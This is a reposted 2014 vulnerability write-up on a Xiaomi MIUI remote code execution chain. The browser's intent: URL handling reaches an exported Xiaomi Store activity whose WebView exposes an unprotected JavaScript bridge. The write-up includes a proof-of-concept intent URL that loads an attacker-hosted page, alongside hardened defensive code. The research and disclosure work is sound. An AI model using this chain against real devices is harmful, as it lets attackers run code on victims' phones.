Millet mobile phone MIUI remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

2014-08-25 00:00:00
Source: www.myhack58.com


Author: Song Shenlei

When reproducing this article, please credit the source: http://blogs.360.cn/360mobile/2014/08/25/miui-rce-vul/

In July, while studying WebView vulnerabilities, I picked a Xiaomi phone running MIUI for testing and found a very obvious security flaw. Through this vulnerability a remote attacker can obtain the permissions of a local APP, erasing the boundary between local vulnerabilities and remote exploitation: vulnerabilities in local apps become remotely exploitable, so the attacker strikes the target from a distance. As soon as I found the vulnerability I reported the details to the Xiaomi Security Response Center; it has since been fixed.

Test environment:
- Phone model: MI 3
- Android version: 4.2.1 JOP40D
- MIUI version: MIUI-JXCCNBE21
- Kernel version: 3.4.35-ga656ab9

**I.** The Xiaomi MIUI native browser has an intent scheme security issue

While using the Xiaomi native browser I noticed that MIUI customizes the network-error page: when the current URL cannot be reached or the network fails, the browser jumps to a custom page, and clicking a link on that page takes you straight into the WIFI settings screen.

[Figure x1]

From my past experience, there are two mainstream ways for an APP to achieve inter-process communication from a static page. One is addJavascriptInterface, which adds a JavaScript bridge object to the WebView; calling that object from the page operates the local Java interface directly. The other is to use Intent.parseUri to parse the URL and let the APP support intent scheme URLs (the intent: protocol): a URL in a particular format is parsed and sent to the system directly as an intent.

Testing confirmed that the Xiaomi browser fully supports intent scheme URLs. The test is as follows: have the Xiaomi browser navigate directly to the address below, and the browser asks the system to fire the intent, which launches the local calendar APP:

```
intent:#Intent;component=com.android.calendar/com.android.calendar.LaunchActivity;end
```

[Figure x2]

I then read the Intent source code in Google's official framework:

/platform/frameworks/base/+/core/java/android/content/Intent.java

Intent.parseUri is defined at line 3966; the part that parses extras reads:

```java
// Excerpt from Intent.parseUri (android.content.Intent): each "key=value" extra is typed
// by a one-letter prefix and written straight into the intent's extras Bundle b.
if (uri.startsWith("S.", i)) b.putString(key, value);
else if (uri.startsWith("B.", i)) b.putBoolean(key, Boolean.parseBoolean(value));
else if (uri.startsWith("b.", i)) b.putByte(key, Byte.parseByte(value));
else if (uri.startsWith("c.", i)) b.putChar(key, value.charAt(0));
else if (uri.startsWith("d.", i)) b.putDouble(key, Double.parseDouble(value));
else if (uri.startsWith("f.", i)) b.putFloat(key, Float.parseFloat(value));
else if (uri.startsWith("i.", i)) b.putInt(key, Integer.parseInt(value));
else if (uri.startsWith("l.", i)) b.putLong(key, Long.parseLong(value));
else if (uri.startsWith("s.", i)) b.putShort(key, Short.parseShort(value));
else throw new URISyntaxException(uri, "unknown EXTRA type", i);
```

From this you can clearly see that when Intent.parseUri parses a URL, the EXTRA data, DATA, action and so on are fully controllable: through a protocol-conformant address, any intent can be sent to any local APP. So if an exported component of some local APP has a vulnerability, it can also be attacked remotely through this entry point.
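As an added example (not the MIUI browser's code), here is how a browser-style WebViewClient can keep supporting intent: URLs while denying the page the component and flag control that parseUri otherwise hands it; the class name is mine and it assumes an Android `Context` is available.

```java
import android.content.Context;
import android.content.Intent;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.net.URISyntaxException;

// Added example, not the MIUI browser's code: a WebViewClient that keeps intent: URL
// support for web content but refuses to let the page pick the receiving component.
public class GuardedIntentWebViewClient extends WebViewClient {
    private final Context context;

    public GuardedIntentWebViewClient(Context context) {
        this.context = context;
    }

    @Override
    public boolean shouldOverrideUrlLoading(WebView view, String url) {
        if (!url.startsWith("intent:")) {
            return false;               // ordinary navigation: let the WebView load it
        }
        Intent intent;
        try {
            intent = Intent.parseUri(url, Intent.URI_INTENT_SCHEME);
        } catch (URISyntaxException e) {
            return true;                // malformed intent URL: consume it, load nothing
        }
        // parseUri faithfully reproduces whatever ;component=, ;SEL; and typed extras the
        // page wrote. A web page must never address an explicit component: that bypasses
        // intent filters and reaches exported activities that never opted in to browser launches.
        intent.setComponent(null);
        intent.setSelector(null);
        intent.addCategory(Intent.CATEGORY_BROWSABLE);
        // Web content must not be able to hand out URI permission grants either.
        intent.setFlags(intent.getFlags()
                & ~(Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION));
        // Dispatch only when some activity has a matching BROWSABLE intent filter.
        if (context.getPackageManager().resolveActivity(intent, 0) == null) {
            return true;
        }
        context.startActivity(intent);
        return true;
    }
}
```

This only controls which app receives the intent; the receiving activity must still validate every extra it reads, because the typed extras from the URL are delivered unchanged.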

**II.** The Xiaomi Store WebView has a remote code execution vulnerability

Following the idea from part I, I began auditing the APPs pre-installed and built into MIUI, hoping to find one that is remotely exploitable. In an automated vulnerability scan I found that the WebView in the official Xiaomi APP "Xiaomi Store" uses addJavascriptInterface and is compiled against an API level below 17, so it may carry the WebView remote code execution vulnerability.

[Figure image003]

So I reverse engineered this APP and found several exported components; for example, the com.xiaomi.shop.activity.MainActivity component accepts a parameter from external callers and loads an arbitrary web page.

[Figure image004]

I also found that the com.xiaomi.shop.ui class associated with this component calls addJavascriptInterface during initialization to register a bridge interface named WE, without any security handling.

[Figure image005]

According to the reversed code, the EXTRA data accepted by the com.xiaomi.shop.activity.MainActivity component is a string. Combined with the Xiaomi browser intent scheme vulnerability from part I, a proof of concept is easily written: the imported web page calls the vulnerable JavascriptInterface WE and can execute arbitrary commands and Java code with the current APP's permissions:

```
intent:#Intent;component=com.xiaomi.shop/com.xiaomi.shop.activity.MainActivity;S.com.xiaomi.shop.extra_closed_url=http://server/acttack.html;end
```
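As an added example (not the Xiaomi Store's code) covering both weaknesses of this section, the URL parameter taken by an exported activity and the unannotated addJavascriptInterface bridge, here is a hardened version; the extra key, the host allowlist and the bridge method are hypothetical, and it assumes targetSdkVersion is at least 17.

```java
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import java.util.Arrays;
import java.util.List;

// Added example, not the Xiaomi Store code: an exported activity that loads a URL from an
// intent extra, written so that neither an intent: URL from a browser nor the pre-API-17
// addJavascriptInterface reflection hole (CVE-2013-4710) yields code execution.
public class SafeWebActivity extends Activity {
    // Hypothetical extra key and host allowlist; the real app's values are not on this page.
    public static final String EXTRA_URL = "com.example.shop.extra_url";
    private static final String HOME_URL = "https://shop.example.com/";
    private static final List<String> ALLOWED_HOSTS = Arrays.asList("shop.example.com");

    // The bridge exposes one narrowly typed method. With targetSdkVersion >= 17 only methods
    // carrying @JavascriptInterface are reachable from JS, so getClass() reflection is closed.
    public static final class Bridge {
        @JavascriptInterface
        public String appVersion() { return "1.0"; }
    }

    // Accept only https URLs on an allowlisted host; anything else falls back to the home page.
    static String sanitizeUrl(String candidate) {
        if (candidate == null) return HOME_URL;
        Uri uri = Uri.parse(candidate);
        if (!"https".equals(uri.getScheme()) || !ALLOWED_HOSTS.contains(uri.getHost())) {
            return HOME_URL;
        }
        return candidate;
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        webView.getSettings().setJavaScriptEnabled(true);
        // Drop the bridges older WebViews register on their own; they share the same weakness.
        webView.removeJavascriptInterface("searchBoxJavaBridge_");
        webView.removeJavascriptInterface("accessibility");
        webView.removeJavascriptInterface("accessibilityTraversal");
        webView.addJavascriptInterface(new Bridge(), "App");
        setContentView(webView);
        // The extra comes from whoever sent the intent, possibly a web page via an intent: URL.
        webView.loadUrl(sanitizeUrl(getIntent().getStringExtra(EXTRA_URL)));
    }
}
```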

**III.** Security recommendations

Android developers should pay attention to security while developing for user experience: a convenience feature in one APP that compromises the security of the whole system does more harm than good.

For the vulnerability analysed here, a malicious attacker could load a remote malicious web page that uses a ROOT exploit and take full control of the victim's phone; the consequences are hard to imagine. Xiaomi has reportedly fixed the Xiaomi Store APP vulnerability, and Xiaomi phone and MIUI users are advised to upgrade as soon as possible.

References:

[1] https://github.com/android/platform_frameworks_base/blob/master/core/java/android/content/Intent.java

[2] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4710